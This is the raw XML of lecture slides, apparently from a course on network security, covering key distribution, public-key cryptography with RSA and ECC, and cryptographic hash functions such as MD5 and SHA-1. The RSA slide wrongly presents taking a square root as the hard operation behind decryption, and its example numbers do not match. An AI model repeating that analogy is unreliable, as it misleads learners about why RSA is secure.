              <a:t>Must negotiate key over private channel </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exchange code book </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Key cards/memory stick/others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third Party: Authentication Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Kerberos)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Details omitted</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38339">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10383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38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38339">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="103833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383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38339">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="103833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38339">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038339">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1038339">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038339">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038339">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="27" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1038339">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038339">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038339">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="31" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1038339">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38339">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038339">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="35" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1038339">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03833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833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8597900" y="6477000"/>
            <a:ext cx="546100" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{88F637DD-9140-457E-BD89-90692A2045F4}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9218" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="490602"/>
            <a:ext cx="7772400" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Public-Key Cryptography</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9219" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="371475" y="1695450"/>
            <a:ext cx="8458200" cy="4715182"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Each user picks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>a public key/private key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>pair </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" baseline="-25000" dirty="0" err="1" smtClean="0"/>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" baseline="-25000" dirty="0" err="1" smtClean="0"/>
              <a:t>private</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>publish the public key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>private key not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>published</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Forward encryption (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>for secrecy):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Encrypt: (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cleartext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" err="1" smtClean="0"/>
              <a:t>Kpublic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>= ciphertext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Decrypt: (ciphertext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" err="1" smtClean="0"/>
              <a:t>Kprivate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cleartext</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reverse encryption (for authentication):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Encrypt: (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cleartext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" err="1" smtClean="0"/>
              <a:t>Kprivate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = ciphertext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Decrypt: (ciphertext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" err="1" smtClean="0"/>
              <a:t>Kpublic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cleartext</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
              <a:ea typeface="宋体"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0386" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Public-Key Cryptography details</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1040387" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="212725" y="1877960"/>
            <a:ext cx="8718550" cy="4980040"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>Public Key Algorithms:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>RSA: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>Rivest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>, Shamir, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>Adleman</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>Encryption with public key makes use of an "easy" operation, such as how much is </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>314159265358979 × 314159265358979?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>Decryption without the private key requires you to perform a hard operation, such as what is the square root of 3912571506419387090594828508241?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>ECC: Elliptic Curve Cryptography</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Pro: no shared secret key to distribute, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Con: computationally much slower than Secret-Key Crypto</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pP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40387">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="104038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4038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40387">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="11" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="104038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4038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40387">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="104038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04038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40387">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="104038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40387">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040387">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1040387">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0403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040387">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1040387">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04038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1040387">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="35" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1040387">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04038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038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8597900" y="6477000"/>
            <a:ext cx="546100" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E2749450-0162-4777-9B9B-C44158B415D2}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62466" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="520874"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Cryptographic Hash Function</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4000" dirty="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62467" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="201706" y="1634777"/>
            <a:ext cx="8513669" cy="4146591"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>A cryptographic hash function is a one-way function:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Such a function  y=f(x) that, given x, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>easy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>to evaluate y = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>f(x); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>given </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>y, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>computationally </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>infeasible to find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Examples: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>MD5 (Message Digest 5) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> produces a 16-byte result</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>SHA-1 (Secure Hash Algorithm)  produces a 20-byte result</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:ea typeface="宋体"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8597900" y="6477000"/>
            <a:ext cx="546100" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
